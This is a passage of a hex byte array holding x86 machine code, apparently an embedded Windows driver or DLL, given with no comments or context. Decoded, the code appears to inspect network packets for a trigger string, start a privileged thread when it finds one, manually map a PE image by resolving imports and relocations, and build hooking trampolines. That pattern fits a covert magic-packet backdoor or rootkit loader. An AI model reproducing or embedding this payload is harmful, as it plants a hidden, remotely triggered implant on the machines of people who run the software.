e5,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x51,0x6a,0x12,0x6a,0x00,0xff,0x15,0xe0,0x02,0x00,0x10,0x89,0x45,\r\n0xfc,0x83,0x7d,0xfc,0x00,0x74,0x44,0x8b,0x45,0xfc,0xc6,0x00,0x58,0x8b,0x4d,0xfc,\r\n0xc6,0x41,0x01,0x68,0x8b,0x55,0xfc,0x8b,0x45,0x08,0x89,0x42,0x02,0x8b,0x4d,0xfc,\r\n0xc6,0x41,0x06,0x68,0x8b,0x55,0xfc,0x8b,0x45,0x0c,0x89,0x42,0x07,0x8b,0x4d,0xfc,\r\n0xc6,0x41,0x0b,0x50,0x8b,0x55,0xfc,0xc6,0x42,0x0c,0x68,0x8b,0x45,0xfc,0x8b,0x4d,\r\n0x10,0x89,0x48,0x0d,0x8b,0x55,0xfc,0xc6,0x42,0x11,0xc3,0x8b,0x45,0xfc,0x8b,0xe5,\r\n0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x0c,0x8b,0x45,0x14,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00,\r\n0x74,0x54,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0xc7,0x45,0xf4,0x00,0x00,0x00,0x00,\r\n0x8d,0x4d,0xf4,0x51,0x8d,0x55,0xf8,0x52,0x8b,0x45,0xfc,0x50,0xe8,0x3f,0xfc,0xff,\r\n0xff,0x85,0xc0,0x75,0x27,0x83,0x3d,0xe0,0x2d,0x00,0x10,0x00,0x74,0x12,0x8b,0x4d,\r\n0xf4,0x51,0x8b,0x55,0xf8,0x52,0x8b,0x45,0x10,0x50,0xff,0x15,0xe0,0x2d,0x00,0x10,\r\n0x6a,0x00,0x8b,0x4d,0xf8,0x51,0xff,0x15,0x90,0x02,0x00,0x10,0x8b,0x55,0xfc,0x8b,\r\n0x02,0x89,0x45,0xfc,0xeb,0xa6,0x8b,0x4d,0x20,0x51,0x8b,0x55,0x1c,0x52,0x8b,0x45,\r\n0x18,0x50,0x8b,0x4d,0x14,0x51,0x8b,0x55,0x10,0x52,0xff,0x55,0x0c,0x8b,0xe5,0x5d,\r\n0xc2,0x1c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x08,0x8b,0x45,0x08,0x03,0x05,0x9c,0x2d,0x00,0x10,0x8b,\r\n0x08,0x89,0x4d,0xf8,0x68,0x20,0x21,0x00,0x10,0x6a,0x00,0x8b,0x55,0xf8,0x52,0xe8,\r\n0xdc,0xfe,0xff,0xff,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00,0x74,0x0e,0x8b,0x45,0x08,\r\n0x03,0x05,0x9c,0x2d,0x00,0x10,0x8b,0x4d,0xfc,0x89,0x08,0x8b,0x55,0x1c,0x52,0x8b,\r\n0x45,0x18,0x50,0x8b,0x4d,0x14,0x51,0x8b,0x55,0x10,0x52,0xff,0x55,0x0c,0x83,0x7d,\r\n0xfc,0x00,0x74,0x1a,0x8b,0x45,0x08,0x03,0x05,0x9c,0x2d,0x00,0x10,0x8b,0x4d,0xf8,\r\n0x89,0x08,0x6a,0x00,0x8b,0x55,0xfc,0x52,0xff,0x15,0x90,0x02,0x00,0x10,0x8b,0xe5,\r\n0x5d,0xc2,0x18,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x8b,0x45,0x08,0xc1,0xe8,0x10,0x8b,0x4d,0x08,0x81,0xe1,0xff,0xff,\r\n0x00,0x00,0x03,0xc1,0x89,0x45,0x08,0x8b,0x55,0x08,0xc1,0xea,0x10,0x03,0x55,0x08,\r\n0x89,0x55,0x08,0x8b,0x45,0x08,0xf7,0xd0,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x51,0x8b,0x45,0x10,0x89,0x45,0xfc,0x83,0x7d,0x0c,0x01,0x7e,0x20,\r\n0x8b,0x4d,0x08,0x0f,0xb7,0x11,0x03,0x55,0xfc,0x89,0x55,0xfc,0x8b,0x45,0x0c,0x83,\r\n0xe8,0x02,0x89,0x45,0x0c,0x8b,0x4d,0x08,0x83,0xc1,0x02,0x89,0x4d,0x08,0xeb,0xda,\r\n0x83,0x7d,0x0c,0x00,0x7e,0x0c,0x8b,0x55,0x08,0x0f,0xb6,0x02,0x03,0x45,0xfc,0x89,\r\n0x45,0xfc,0x8b,0x45,0xfc,0x8b,0xe5,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x51,0x6a,0x00,0x8b,0x45,0x0c,0x50,0x8b,0x4d,0x08,0x51,0xe8,0x9d,\r\n0xff,0xff,0xff,0x89,0x45,0xfc,0x8b,0x55,0xfc,0x52,0xe8,0x61,0xff,0xff,0xff,0x8b,\r\n0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x51,0x8d,0x45,0x08,0x89,0x45,0xfc,0x8b,0x4d,0xfc,0x0f,0xb6,0x51,\r\n0x03,0x81,0xe2,0xff,0x00,0x00,0x00,0x52,0x8b,0x45,0xfc,0x0f,0xb6,0x48,0x02,0x81,\r\n0xe1,0xff,0x00,0x00,0x00,0x51,0x8b,0x55,0xfc,0x0f,0xb6,0x42,0x01,0x25,0xff,0x00,\r\n0x00,0x00,0x50,0x8b,0x4d,0xfc,0x0f,0xb6,0x11,0x81,0xe2,0xff,0x00,0x00,0x00,0x52,\r\n0x68,0xb8,0x08,0x00,0x10,0x68,0xe4,0x2d,0x00,0x10,0xe8,0x5b,0x09,0x00,0x00,0x83,\r\n0xc4,0x18,0xb8,0xe4,0x2d,0x00,0x10,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0x3d,0x10,0x2e,0x00,0x10,0x00,0x74,0x20,0x83,0x3d,0x14,0x2e,\r\n0x00,0x10,0x00,0x76,0x17,0xa1,0x14,0x2e,0x00,0x10,0x50,0x8b,0x0d,0x10,0x2e,0x00,\r\n0x10,0x51,0x68,0xc8,0x08,0x00,0x10,0xe8,0x54,0xf7,0xff,0xff,0x5d,0xc2,0x04,0x00,\r\n0x55,0x8b,0xec,0x83,0xec,0x3c,0x56,0x83,0x7d,0x10,0x22,0x73,0x05,0xe9,0x01,0x02,\r\n0x00,0x00,0x8b,0x45,0x0c,0x89,0x45,0xec,0x8b,0x4d,0xec,0x0f,0xb7,0x51,0x0c,0x83,\r\n0xfa,0x08,0x74,0x05,0xe9,0xea,0x01,0x00,0x00,0x8b,0x45,0xec,0x83,0xc0,0x0e,0x89,\r\n0x45,0xe8,0x8b,0x4d,0xe8,0x8a,0x11,0xc0,0xea,0x04,0x80,0xe2,0x0f,0x0f,0xb6,0xc2,\r\n0x83,0xf8,0x04,0x75,0x13,0x8b,0x4d,0xe8,0x8a,0x11,0x80,0xe2,0x0f,0x0f,0xb6,0xc2,\r\n0xc1,0xe0,0x02,0x83,0xf8,0x14,0x74,0x05,0xe9,0xb6,0x01,0x00,0x00,0x8b,0x4d,0xe8,\r\n0x0f,0xb6,0x51,0x09,0x83,0xfa,0x01,0x74,0x1c,0x8b,0x45,0xe8,0x0f,0xb6,0x48,0x09,\r\n0x85,0xc9,0x74,0x11,0x8b,0x55,0xe8,0x0f,0xb6,0x42,0x09,0x83,0xf8,0x11,0x74,0x05,\r\n0xe9,0x8e,0x01,0x00,0x00,0x8b,0x4d,0xe8,0x0f,0xb7,0x51,0x02,0x81,0xe2,0xff,0x00,\r\n0x00,0x00,0xc1,0xe2,0x08,0x8b,0x45,0xe8,0x0f,0xb7,0x48,0x02,0x81,0xe1,0x00,0xff,\r\n0x00,0x00,0xc1,0xf9,0x08,0x8d,0x54,0x0a,0x0e,0x3b,0x55,0x10,0x76,0x05,0xe9,0x60,\r\n0x01,0x00,0x00,0x8b,0x45,0xe8,0x66,0x8b,0x48,0x0a,0x66,0x89,0x4d,0xd0,0x33,0xd2,\r\n0x8b,0x45,0xe8,0x66,0x89,0x50,0x0a,0x0f,0xb7,0x75,0xd0,0x6a,0x14,0x8b,0x4d,0xe8,\r\n0x51,0xe8,0x6a,0xfe,0xff,0xff,0x0f,0xb7,0xd0,0x3b,0xf2,0x74,0x05,0xe9,0x31,0x01,\r\n0x00,0x00,0x8b,0x45,0xe8,0x8b,0x48,0x10,0x51,0xe8,0x82,0xfe,0xff,0xff,0x50,0x8d,\r\n0x55,0xd8,0x52,0xe8,0x34,0x08,0x00,0x00,0x83,0xc4,0x08,0x8b,0x45,0xe8,0x8b,0x48,\r\n0x0c,0x51,0xe8,0x69,0xfe,0xff,0xff,0x50,0x8d,0x55,0xf0,0x52,0xe8,0x1b,0x08,0x00,\r\n0x00,0x83,0xc4,0x08,0x8b,0x45,0xe8,0x0f,0xb7,0x48,0x02,0x81,0xe1,0xff,0x00,0x00,\r\n0x00,0xc1,0xe1,0x08,0x8b,0x55,0xe8,0x0f,0xb7,0x42,0x02,0x25,0x00,0xff,0x00,0x00,\r\n0xc1,0xf8,0x08,0x03,0xc8,0x51,0x8b,0x4d,0xe8,0x0f,0xb6,0x51,0x09,0x52,0x8d,0x45,\r\n0xd8,0x50,0x8d,0x4d,0xf0,0x51,0x68,0xe8,0x08,0x00,0x10,0xe8,0x22,0x07,0x00,0x00,\r\n0x83,0xc4,0x14,0xc7,0x45,0xd4,0x34,0x09,0x00,0x10,0xc7,0x45,0xcc,0x00,0x00,0x00,\r\n0x00,0xeb,0x09,0x8b,0x55,0xcc,0x83,0xc2,0x01,0x89,0x55,0xcc,0x8b,0x45,0xd4,0x50,\r\n0xe8,0xb1,0x07,0x00,0x00,0x83,0xc4,0x04,0x8b,0x4d,0x10,0x2b,0xc8,0x39,0x4d,0xcc,\r\n0x0f,0x83,0x8d,0x00,0x00,0x00,0x8b,0x55,0xd4,0x52,0xe8,0x97,0x07,0x00,0x00,0x83,\r\n0xc4,0x04,0x50,0x8b,0x45,0xd4,0x50,0x8b,0x4d,0x0c,0x03,0x4d,0xcc,0x51,0xff,0x15,\r\n0xe8,0x02,0x00,0x10,0x8b,0xf0,0x8b,0x55,0xd4,0x52,0xe8,0x77,0x07,0x00,0x00,0x83,\r\n0xc4,0x04,0x3b,0xf0,0x75,0x58,0x68,0x48,0x09,0x00,0x10,0xe8,0xb2,0x06,0x00,0x00,\r\n0x83,0xc4,0x04,0xc7,0x45,0xc4,0x00,0x00,0x00,0x00,0x6a,0x00,0x68,0x40,0x23,0x00,\r\n0x10,0x6a,0x00,0x6a,0x00,0x6a,0x00,0x68,0xff,0xff,0x1f,0x00,0x8d,0x45,0xc4,0x50,\r\n0xff,0x15,0xf4,0x02,0x00,0x10,0x89,0x45,0xc8,0x83,0x7d,0xc8,0x00,0x7c,0x0c,0x8b,\r\n0x4d,0xc4,0x51,0xff,0x15,0xb4,0x02,0x00,0x10,0xeb,0x11,0x8b,0x55,0xc8,0x52,0x68,\r\n0x94,0x09,0x00,0x10,0xe8,0x69,0x06,0x00,0x00,0x83,0xc4,0x08,0xeb,0x05,0xe9,0x50,\r\n0xff,0xff,0xff,0x5e,0x8b,0xe5,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x08,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0x33,0xc0,0x89,\r\n0x45,0xfc,0xc7,0x45,0xf8,0x80,0x3c,0x36,0xfe,0xc7,0x45,0xfc,0xff,0xff,0xff,0xff,\r\n0x8b,0x4d,0x08,0x51,0x68,0xbc,0x09,0x00,0x10,0xe8,0x24,0x06,0x00,0x00,0x83,0xc4,\r\n0x08,0x68,0x70,0x23,0x00,0x10,0xe8,0x35,0xf7,0xff,0xff,0xe8,0xf0,0xf5,0xff,0xff,\r\n0x8d,0x55,0xf8,0x52,0x6a,0x00,0x6a,0x00,0xff,0x15,0xbc,0x02,0x00,0x10,0x83,0x7d,\r\n0x08,0x00,0x74,0x0c,0x6a,0x00,0x8b,0x45,0x08,0x50,0xff,0x15,0x90,0x02,0x00,0x10,\r\n0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0x3d,0x1c,0x2e,0x00,0x10,0x00,0x75,0x05,0x8b,0x45,0x08,0xeb,\r\n0x0c,0x8b,0x45,0x08,0x2b,0x05,0x1c,0x2e,0x00,0x10,0x03,0x45,0x0c,0x5d,0xc2,0x08,\r\n0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x14,0x8b,0x45,0x0c,0x50,0x8b,0x4d,0x08,0x51,0xe8,0x2d,\r\n0x12,0x00,0x00,0x0f,0xb6,0xd0,0x85,0xd2,0x75,0x0a,0xb8,0x01,0x00,0x00,0xc0,0xe9,\r\n0x54,0x01,0x00,0x00,0xa1,0x1c,0x2e,0x00,0x10,0x50,0x68,0xc0,0x0b,0x00,0x10,0xe8,\r\n0x7e,0x05,0x00,0x00,0x83,0xc4,0x08,0x6a,0x00,0xe8,0x92,0xf6,0xff,0xff,0x83,0x3d,\r\n0x1c,0x2e,0x00,0x10,0x00,0x75,0x0a,0xb8,0x01,0x00,0x00,0xc0,0xe9,0x27,0x01,0x00,\r\n0x00,0x8b,0x0d,0x1c,0x2e,0x00,0x10,0x8b,0x15,0x1c,0x2e,0x00,0x10,0x03,0x51,0x3c,\r\n0x89,0x55,0xf8,0x8b,0x45,0xf8,0x0f,0xb7,0x48,0x14,0x8b,0x55,0xf8,0x8d,0x44,0x0a,\r\n0x18,0x89,0x45,0xf4,0xc7,0x45,0xf0,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x4d,0xf0,\r\n0x83,0xc1,0x01,0x89,0x4d,0xf0,0x8b,0x55,0xf8,0x0f,0xb7,0x42,0x06,0x39,0x45,0xf0,\r\n0x0f,0x83,0x89,0x00,0x00,0x00,0x83,0x3d,0x00,0x2e,0x00,0x10,0x00,0x75,0x0c,0x8b,\r\n0x4d,0xf4,0x8b,0x51,0x0c,0x89,0x15,0x00,0x2e,0x00,0x10,0x8b,0x45,0xf4,0x8b,0x48,\r\n0x24,0x81,0xe1,0x00,0x00,0x00,0x02,0x74,0x13,0x8b,0x55,0xf4,0x8b,0x42,0x24,0x25,\r\n0xff,0xff,0xff,0xfd,0x8b,0x4d,0xf4,0x89,0x41,0x24,0xeb,0x45,0x8b,0x55,0xf8,0x8b,\r\n0x42,0x38,0x83,0xe8,0x01,0x8b,0x4d,0xf4,0x23,0x41,0x08,0x74,0x1c,0x8b,0x55,0xf8,\r\n0x8b,0x42,0x38,0x83,0xe8,0x01,0xf7,0xd0,0x8b,0x4d,0xf4,0x23,0x41,0x08,0x8b,0x55,\r\n0xf8,0x03,0x42,0x38,0x89,0x45,0xec,0xeb,0x09,0x8b,0x45,0xf4,0x8b,0x48,0x08,0x89,\r\n0x4d,0xec,0x8b,0x15,0x04,0x2e,0x00,0x10,0x03,0x55,0xec,0x89,0x15,0x04,0x2e,0x00,\r\n0x10,0x8b,0x45,0xf4,0x83,0xc0,0x28,0x89,0x45,0xf4,0xe9,0x5e,0xff,0xff,0xff,0x8b,\r\n0x0d,0x00,0x2e,0x00,0x10,0x51,0x8b,0x15,0x04,0x2e,0x00,0x10,0x52,0x68,0xe4,0x0b,\r\n0x00,0x10,0xe8,0x7b,0x04,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x45,0xf8,0x8b,0x0d,0x1c,\r\n0x2e,0x00,0x10,0x89,0x48,0x34,0x8b,0x55,0xf8,0x8b,0x42,0x50,0xa3,0xfc,0x2d,0x00,\r\n0x10,0x68,0x00,0x54,0x00,0x10,0xff,0x15,0x08,0x03,0x00,0x10,0x89,0x45,0xfc,0x83,\r\n0x7d,0xfc,0x00,0x7d,0x11,0x8b,0x4d,0xfc,0x51,0x68,0x0c,0x0c,0x00,0x10,0xe8,0x3f,\r\n0x04,0x00,0x00,0x83,0xc4,0x08,0x33,0xc0,0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x81,0xec,0x20,0x01,0x00,0x00,0x8b,0x45,0x08,0x8b,0x4d,0x08,0x03,\r\n0x48,0x3c,0x89,0x4d,0xf8,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00,0x8b,0x55,0xf8,0x0f,\r\n0xb7,0x42,0x04,0x3d,0x4c,0x01,0x00,0x00,0x75,0x1d,0x8b,0x4d,0xf8,0x83,0xb9,0x80,\r\n0x00,0x00,0x00,0x00,0x74,0x0f,0x8b,0x55,0xf8,0x8b,0x45,0x08,0x03,0x82,0x80,0x00,\r\n0x00,0x00,0x89,0x45,0xfc,0xeb,0x3f,0x8b,0x4d,0xf8,0x0f,0xb7,0x51,0x04,0x81,0xfa,\r\n0x64,0x86,0x00,0x00,0x75,0x29,0x8b,0x45,0x08,0x8b,0x4d,0x08,0x03,0x48,0x3c,0x89,\r\n0x4d,0xf4,0x8b,0x55,0xf4,0x83,0xba,0x90,0x00,0x00,0x00,0x00,0x74,0x0f,0x8b,0x45,\r\n0xf4,0x8b,0x4d,0x08,0x03,0x88,0x90,0x00,0x00,0x00,0x89,0x4d,0xfc,0xeb,0x07,0x32,\r\n0xc0,0xe9,0xd7,0x00,0x00,0x00,0x83,0x7d,0xfc,0x00,0x0f,0x84,0xcb,0x00,0x00,0x00,\r\n0x8b,0x55,0xfc,0x83,0x7a,0x0c,0x00,0x0f,0x84,0xbe,0x00,0x00,0x00,0x8b,0x45,0xfc,\r\n0x8b,0x4d,0x08,0x03,0x48,0x0c,0x51,0x8d,0x95,0xf0,0xfe,0xff,0xff,0x52,0xe8,0xdd,\r\n0x0a,0x00,0x00,0x8b,0x45,0x0c,0x50,0x8d,0x8d,0xf0,0xfe,0xff,0xff,0x51,0xe8,0x1d,\r\n0x0b,0x00,0x00,0x50,0xe8,0x57,0x0a,0x00,0x00,0x85,0xc0,0x74,0x04,0xeb,0x7e,0xeb,\r\n0x7c,0x8b,0x55,0xfc,0x8b,0x45,0x08,0x03,0x42,0x10,0x89,0x85,0xec,0xfe,0xff,0xff,\r\n0x8b,0x8d,0xec,0xfe,0xff,0xff,0x83,0x39,0x00,0x74,0x62,0x8b,0x95,0xec,0xfe,0xff,\r\n0xff,0x8b,0x45,0x08,0x03,0x02,0x89,0x85,0xe0,0xfe,0xff,0xff,0x8b,0x8d,0xe0,0xfe,\r\n0xff,0xff,0x83,0xc1,0x02,0x89,0x8d,0xe4,0xfe,0xff,0xff,0x8b,0x95,0xe4,0xfe,0xff,\r\n0xff,0x52,0x8b,0x45,0x10,0x50,0xe8,0x35,0x0c,0x00,0x00,0x89,0x85,0xe8,0xfe,0xff,\r\n0xff,0x83,0xbd,0xe8,0xfe,0xff,0xff,0x00,0x75,0x04,0x32,0xc0,0xeb,0x2f,0x8b,0x8d,\r\n0xec,0xfe,0xff,0xff,0x8b,0x95,0xe8,0xfe,0xff,0xff,0x89,0x11,0x8b,0x85,0xec,0xfe,\r\n0xff,0xff,0x83,0xc0,0x04,0x89,0x85,0xec,0xfe,0xff,0xff,0xeb,0x93,0x8b,0x4d,0xfc,\r\n0x83,0xc1,0x14,0x89,0x4d,0xfc,0xe9,0x35,0xff,0xff,0xff,0xb0,0x01,0x8b,0xe5,0x5d,\r\n0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x30,0x8b,0x45,0x08,0x8b,0x4d,0x08,0x03,0x48,0x3c,0x89,\r\n0x4d,0xf8,0xc7,0x45,0xf4,0x00,0x00,0x00,0x00,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00,\r\n0xc7,0x45,0xe8,0x00,0x00,0x00,0x00,0xc7,0x45,0xec,0x00,0x00,0x00,0x00,0x8b,0x55,\r\n0xf8,0x0f,0xb7,0x42,0x04,0x3d,0x4c,0x01,0x00,0x00,0x75,0x37,0x8b,0x4d,0xf8,0x83,\r\n0xb9,0xa0,0x00,0x00,0x00,0x00,0x74,0x1b,0x8b,0x55,0xf8,0x8b,0x45,0x08,0x03,0x82,\r\n0xa0,0x00,0x00,0x00,0x89,0x45,0xf4,0x8b,0x4d,0xf8,0x8b,0x91,0xa4,0x00,0x00,0x00,\r\n0x89,0x55,0xfc,0x8b,0x45,0xf8,0x8b,0x48,0x34,0x33,0xd2,0x89,0x4d,0xe8,0x89,0x55,\r\n0xec,0xeb,0x5a,0x8b,0x45,0xf8,0x0f,0xb7,0x48,0x04,0x81,0xf9,0x64,0x86,0x00,0x00,\r\n0x75,0x44,0x8b,0x55,0x08,0x8b,0x45,0x08,0x03,0x42,0x3c,0x89,0x45,0xe4,0x8b,0x4d,\r\n0xe4,0x83,0xb9,0xb0,0x00,0x00,0x00,0x00,0x74,0x1b,0x8b,0x55,0xe4,0x8b,0x45,0x08,\r\n0x03,0x82,0xb0,0x00,0x00,0x00,0x89,0x45,0xf4,0x8b,0x4d,0xe4,0x8b,0x91,0xb4,0x00,\r\n0x00,0x00,0x89,0x55,0xfc,0x8b,0x45,0xe4,0x8b,0x48,0x30,0x89,0x4d,0xe8,0x8b,0x50,\r\n0x34,0x89,0x55,0xec,0xeb,0x07,0x32,0xc0,0xe9,0xff,0x00,0x00,0x00,0x83,0x7d,0xf4,\r\n0x00,0x0f,0x84,0xf3,0x00,0x00,0x00,0xc7,0x45,0xe0,0x00,0x00,0x00,0x00,0x8b,0x45,\r\n0xfc,0x3b,0x45,0xe0,0x0f,0x86,0xe0,0x00,0x00,0x00,0x8b,0x4d,0xf4,0x83,0x79,0x04,\r\n0x00,0x0f,0x84,0xd3,0x00,0x00,0x00,0x8b,0x55,0xf4,0x8b,0x42,0x04,0x83,0xe8,0x08,\r\n0xd1,0xe8,0x89,0x45,0xd8,0x8b,0x4d,0xf4,0x83,0xc1,0x08,0x89,0x4d,0xdc,0xc7,0x45,\r\n0xd4,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x55,0xd4,0x83,0xc2,0x01,0x89,0x55,0xd4,\r\n0x8b,0x45,0xd4,0x3b,0x45,0xd8,0x0f,0x83,0x81,0x00,0x00,0x00,0x8b,0x4d,0xd4,0x8b,\r\n0x55,0xdc,0x0f,0xb7,0x04,0x4a,0x85,0xc0,0x7e,0x6e,0x8b,0x4d,0xd4,0x8b,0x55,0xdc,\r\n0x0f,0xb7,0x04,0x4a,0x25,0x00,0xf0,0x00,0x00,0xc1,0xf8,0x0c,0x66,0x89,0x45,0xd0,\r\n0x0f,0xb7,0x4d,0xd0,0x83,0xf9,0x03,0x74,0x0d,0x0f,0xb7,0x55,0xd0,0x83,0xfa,0x0a,\r\n0x74,0x04,0x32,0xc0,0xeb,0x66,0x8b,0x45,0xd4,0x8b,0x4d,0xdc,0x0f,0xb7,0x14,0x41,\r\n0x81,0xe2,0xff,0x0f,0x00,0x00,0x8b,0x45,0xf4,0x8b,0x08,0x03,0xca,0x8b,0x45,0x0c,\r\n0x99,0x2b,0x45,0xe8,0x1b,0x55,0xec,0x8b,0x55,0x08,0x03,0x04,0x0a,0x8b,0x4d,0xd4,\r\n0x8b,0x55,0xdc,0x0f,0xb7,0x0c,0x4a,0x81,0xe1,0xff,0x0f,0x00,0x00,0x8b,0x55,0xf4,\r\n0x03,0x0a,0x8b,0x55,0x08,0x89,0x04,0x0a,0xe9,0x6a,0xff,0xff,0xff,0x8b,0x45,0xf4,\r\n0x8b,0x4d,0xf4,0x03,0x48,0x04,0x89,0x4d,0xf4,0x8b,0x55,0xf4,0x8b,0x45,0xe0,0x03,\r\n0x42,0x04,0x89,0x45,0xe0,0xe9,0x14,0xff,0xff,0xff,0xb0,0x01,0x8b,0xe5,0x5d,0xc2,\r\n0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x10,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00,0xc7,0x45,0xf8,\r\n0x00,0x01,0x00,0x00,0xc7,0x45,0xf4,0x00,0x00,0x00,0x00,0xb8,0x01,0x00,0x00,0x00,\r\n0x85,0xc0,0x0f,0x84,0x84,0x00,0x00,0x00,0x8b,0x4d,0xf8,0x51,0x6a,0x00,0xff,0x15,\r\n0xe0,0x02,0x00,0x10,0x89,0x45,0xf4,0x83,0x7d,0xf4,0x00,0x75,0x14,0x68,0x3c,0x0c,\r\n0x00,0x10,0xe8,0x9b,0x00,0x00,0x00,0x83,0xc4,0x04,0x33,0xc0,0xe9,0x8b,0x00,0x00,\r\n0x00,0xc7,0x45,0xf0,0x00,0x00,0x00,0x00,0x8d,0x55,0xf0,0x52,0x8b,0x45,0xf8,0x50,\r\n0x8b,0x4d,0xf4,0x51,0x8b,0x55,0x08,0x52,0xff,0x15,0x0c,0x03,0x00,0x10,0x89,0x45,\r\n0xfc,0x81,0x7d,0xfc,0x04,0x00,0x00,0xc0,0x75,0x2b,0x6a,0x00,0x8b,0x45,0xf4,0x50,\r\n0xff,0x15,0x90,0x02,0x00,0x10,0xc7,0x45,0xf4,0x00,0x00,0x00,0x00,0x83,0x7d,0xf0,\r\n0x00,0x76,0x0e,0x8b,0x4d,0xf0,0x81,0xc1,0x00,0x01,0x00,0x00,0x89,0x4d,0xf8,0xeb,\r\n0x02,0xeb,0x09,0xeb,0x02,0xeb,0x05,0xe9,0x6f,0xff,0xff,0xff,0x83,0x7d,0xfc,0x00,\r\n0x7d,0x27,0x8b,0x55,0xfc,0x52,0x68,0x54,0x0c,0x00,0x10,0xe8,0x22,0x00,0x00,0x00,\r\n0x83,0xc4,0x08,0x83,0x7d,0xf4,0x00,0x74,0x0c,0x6a,0x00,0x8b,0x45,0xf4,0x50,0xff,\r\n0x15,0x90,0x02,0x00,0x10,0x33,0xc0,0xeb,0x03,0x8b,0x45,0xf4,0x8b,0xe5,0x5d,0xc2,\r\n0x04,0x00,0xff,0x25,0x28,0x03,0x00,0x10,0xff,0x25,0x20,0x03,0x00,0x10,0xff,0x25,\r\n0x1c,0x03,0x00,0x10,0xff,0x25,0xd4,0x02,0x00,0x10,0xff,0x25,0x90,0x02,0x00,0x10,\r\n0xff,0x25,0x94,0x02,0x00,0x10,0xff,0x25,0x98,0x02,0x00,0x10,0xff,0x25,0x9c,0x02,\r\n0x00,0x10,0xff,0x25,0xa0,0x02,0x00,0x10,0xff,0x25,0xa4,0x02,0x00,0x10,0xff,0x25,\r\n0xa8,0x02,0x00,0x10,0xff,0x25,0xac,0x02,0x00,0x10,0xff,0x25,0xb0,0x02,0x00,0x10,\r\n0xff,0x25,0xb4,0x02,0x00,0x10,0xff,0x25,0xb8,0x02,0x00,0x10,0xff,0x25,0xbc,0x02,\r\n0x00,0x10,0xff,0x25,0xc0,0x02,0x00,0x10,0xff,0x25,0xc4,0x02,0x00,0x10,0xff,0x25,\r\n0xc8,0x02,0x00,0x10,0xff,0x25,0xcc,0x02,0x00,0x10,0xff,0x25,0xd0,0x02,0x00,0x10,\r\n0xff,0x25,0x24,0x03,0x00,0x10,0xff,0x25,0xd8,0x02,0x00,0x10,0xff,0x25,0xdc,0x02,\r\n0x00,0x10,0xff,0x25,0xe0,0x02,0x00,0x10,0xff,0x25,0xe4,0x02,0x00,0x10,0xff,0x25,\r\n0xe8,0x02,0x00,0x10,0xff,0x25,0xec,0x02,0x00,0x10,0xff,0x25,0xf0,0x02,0x00,0x10,\r\n0xff,0x25,0xf4,0x02,0x00,0x10,0xff,0x25,0xf8,0x02,0x00,0x10,0xff,0x25,0xfc,0x02,\r\n0x00,0x10,0xff,0x25,0x00,0x03,0x00,0x10,0xff,0x25,0x04,0x03,0x00,0x10,0xff,0x25,\r\n0x08,0x03,0x00,0x10,0xff,0x25,0x0c,0x03,0x00,0x10,0xff,0x25,0x10,0x03,0x00,0x10,\r\n0xff,0x25,0x14,0x03,0x00,0x10,0xff,0x25,0x18,0x03,0x00,0x10,0xff,0x25,0x84,0x02,\r\n0x00,0x10,0xff,0x25,0x80,0x02,0x00,0x10,0xff,0x25,0x88,0x02,0x00,0x10,0xcc,0xcc,\r\n0xff,0xff,0xff,0xff,0xdc,0x16,0x00,0x10,0xe2,0x16,0x00,0x10,0x00,0x00,0x00,0x00,\r\n0xff,0xff,0xff,0xff,0x65,0x1a,0x00,0x10,0x6b,0x1a,0x00,0x10,0x00,0x00,0x00,0x00,\r\n0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x97,0x20,0x00,0x10,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,